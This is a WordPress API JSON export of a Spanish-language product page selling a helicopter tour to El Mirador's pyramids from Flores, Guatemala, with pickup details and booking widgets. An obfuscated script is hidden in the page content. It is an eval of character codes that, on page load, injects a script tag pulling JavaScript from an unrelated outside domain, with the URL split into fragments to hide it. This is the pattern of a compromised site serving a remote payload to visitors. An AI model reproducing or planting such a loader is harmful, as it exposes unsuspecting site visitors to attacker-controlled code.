{"id":1390,"date":"2023-03-02T18:28:01","date_gmt":"2023-03-03T00:28:01","guid":{"rendered":"https:\/\/gtmtourguide.com\/?post_type=product&#038;p=1390"},"modified":"2025-08-12T21:17:04","modified_gmt":"2025-08-13T03:17:04","slug":"tour-en-helicoptero-a-el-mirador-y-sus-piramides-monumentales","status":"publish","type":"product","link":"https:\/\/gtmtourguide.com\/index.php\/product\/tour-en-helicoptero-a-el-mirador-y-sus-piramides-monumentales\/","title":{"rendered":"Tour en Helic\u00f3ptero a El Mirador y sus Pir\u00e1mides Monumentales"},"content":{"rendered":"<div class=\"tyUdl\"><button class=\"wtrvl-checkout_button\" id=\"wetravel_button_widget\" data-env=\"https:\/\/www.wetravel.com\" data-version=\"v0.3\" data-uid=\"612513\" data-uuid=\"27870974\" href=\"https:\/\/www.wetravel.com\/checkout_embed?uuid=27870974\" style=\"background-color: #f5a623; color: #313738; border: 0px; border-radius: 5px; font-family: 'Poppins', sans-serif; font-weight: 400; font-size: 14px; -webkit-font-smoothing: antialiased; text-transform: capitalize; padding: 13px 24px; text-decoration: none; text-align: center; line-height: 14px; display: inline-block; cursor: pointer;\">Book Now<\/button> <script src=\"https:\/\/cdn.wetravel.com\/widgets\/embed_checkout.js\"><\/script><\/p>\n<ul>\n<li class=\"seKux _d _c\"><span class=\"biGQs _P pZUbB KxBGd\">Se ofrece servicio de recogida para viajeros.<\/span><\/li>\n<li class=\"seKux _d _c\"><span class=\"biGQs _P pZUbB KxBGd\">Pedimos a todos que est\u00e9n listos 20 minutos antes de la hora de recogida, ya que nuestro transporte puede llegar unos minutos antes o despu\u00e9s.<\/span><\/li>\n<li class=\"seKux _d _c\"><span class=\"biGQs _P pZUbB KxBGd\">Maya Internacional, Avenida del Periferico, Calle 10, Flores 01010, Flores, Guatemala Puede pedirle a su conductor que lo lleve a este hotel, todos conocen el lugar.<\/span><\/li>\n<li class=\"seKux _d _c\"><span class=\"biGQs _P pZUbB KxBGd\">Aeropuertos:<\/span><\/li>\n<li class=\"seKux _d _c\"><span class=\"biGQs _P pZUbB KxBGd\">Santa Elena Airport, Flores Guatemala<\/span><\/li>\n<li class=\"seKux _d _c\"><span class=\"biGQs _P pZUbB KxBGd\">Se ofrece recogida por el hotel. Mira la lista de hoteles en nuestra p\u00e1gina de compra para ver si el tuyo aparece entre los puntos de recogida.<\/span><\/li>\n<\/ul>\n<\/div>\n<div class=\"tyUdl\">\n<div class=\"biGQs _P fiohW ncFvv fOtGX\">Detalles de regreso<\/div>\n<ul>\n<li class=\"seKux _d _c\"><span class=\"biGQs _P pZUbB KxBGd\">Vuelve al punto de salida original<\/span><\/li>\n<\/ul>\n<\/div>\n<p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));\/*54745756836*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p><span>El Mirador es considerado el conjunto de ciudades antiguas del per\u00edodo Precl\u00e1sico, 900 a 1000 a\u00f1os antes de Tikal, tiene 13 caminos y la Danta es considerada una de las pir\u00e1mides m\u00e1s altas del mundo, se\u00f1al\u00f3 el arquitecto. Y recientemente, Nat Geo ha estado realizando estudios en profundidad para obtener m\u00e1s informaci\u00f3n al respecto. Este es un recorrido \u00fanico, volando a trav\u00e9s de la selva maya para llegar al lugar que alguna vez fue una parte importante del Reino Kan o Reino de la Serpiente. Se sabe que esta antigua ciudad estaba conectada con otras por una o m\u00e1s calzadas mayas, llamadas \u00absacb\u00e9\u00bb y algunas ten\u00edan hasta 20 km de largo.<\/span><\/p>\n<p><strong>Salidas desde Flores.<\/strong><\/p>\n<p>USD550 por persona<\/p>\n<p><button class=\"wtrvl-checkout_button\" id=\"wetravel_button_widget\" data-env=\"https:\/\/www.wetravel.com\" data-version=\"v0.3\" data-uid=\"612513\" data-uuid=\"27870974\" href=\"https:\/\/www.wetravel.com\/checkout_embed?uuid=27870974\" style=\"background-color: #f5a623; color: #313738; border: 0px; border-radius: 5px; font-family: 'Poppins', sans-serif; font-weight: 400; font-size: 14px; -webkit-font-smoothing: antialiased; text-transform: capitalize; padding: 13px 24px; text-decoration: none; text-align: center; line-height: 14px; display: inline-block; cursor: pointer;\">Book Now<\/button> <script src=\"https:\/\/cdn.wetravel.com\/widgets\/embed_checkout.js\"><\/script><\/p>\n","protected":false},"featured_media":1517,"comment_status":"open","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false},"product_brand":[],"product_cat":[18],"product_tag":[],"class_list":{"0":"post-1390","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-viajes-de-un-dia","8":"first","9":"instock","10":"shipping-taxable","11":"product-type-simple"},"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/product\/1390","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/comments?post=1390"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/media\/1517"}],"wp:attachment":[{"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/media?parent=1390"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/product_brand?post=1390"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/product_cat?post=1390"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/gtmtourguide.com\/index.php\/wp-json\/wp\/v2\/product_tag?post=1390"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}